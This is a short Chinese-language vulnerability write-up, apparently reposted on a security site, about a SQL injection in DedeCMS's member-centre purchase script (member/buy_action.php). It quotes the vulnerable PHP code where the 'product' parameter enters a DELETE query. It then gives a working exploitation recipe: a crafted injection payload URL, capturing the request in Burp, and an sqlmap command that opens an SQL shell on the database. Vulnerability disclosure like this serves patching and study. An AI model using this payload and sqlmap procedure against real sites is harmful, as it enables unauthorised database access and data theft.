Dedecms 会员中心注入漏洞

没穿底裤 2019年12月31日22:04:56评论306 views字数 1141阅读3分48秒阅读模式
摘要

[php][/php]利用方式 注册用户之后登陆打开http://127.0.0.1/dede/member/buy_action.php?product=1' and @`'` and


漏洞作者: Matt

[php]

member/buy_action.php require_once(dirname(__FILE__)."/config.php"); CheckRank(0,0); $menutype = 'mydede'; $menutype_son = 'op'; require_once DEDEINC.'/dedetemplate.class.php';  $product = isset($product) ? trim($product) : ''; $mid = $cfg_ml->M_ID; $ptype = ''; $pname = ''; $price = ''; $mtime = time();  if(isset($pd_encode) && isset($pd_verify) && md5  ("payment".$pd_encode.$cfg_cookie_encode) == $pd_verify) {      parse_str(mchStrCode($pd_encode,'DECODE'),$mch_Post);     foreach($mch_Post as $k => $v) $$k = $v;     $row  = $dsql->GetOne("SELECT * FROM #@__member_operation WHERE   mid='$mid' And sta=0 AND product='$product'");     if(!isset($row['buyid']))     {         ShowMsg("请不要重复提交表单!", 'javascript:;');         exit();     }     if(!isset($paytype))     {         ShowMsg("请选择支付方式!", 'javascript:;');         exit();      }     $buyid = $row['buyid'];  }else{      $buyid = 'M'.$mid.'T'.$mtime.'RN'.mt_rand(100,999);     //删除用户旧的未付款的同类记录     if(!empty($product))         {         $dsql->ExecuteNoneQuery("Delete From #@__member_operation WHERE   mid='$mid' And sta=0 And product='$product'");//注入点     }

[/php]

漏洞证明:

利用方式 注册用户之后登陆

打开http://127.0.0.1/dede/member/buy_action.php?product=1' and @`'` and

1=1* and '1'='1

先利用burp抓一下访问包

然后将抓到的内容保存

然后利用sqlmap进行注入 执行如下命令

sqlmap.py -r c:/1.txt --sql-shell --threads=10 --dbms mysql

其中的1.txt就是我们保存的包文件

Dedecms 会员中心注入漏洞

Dedecms 会员中心注入漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2019年12月31日22:04:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Dedecms 会员中心注入漏洞http://cn-sec.com/archives/75413.html

发表评论

匿名网友 填写信息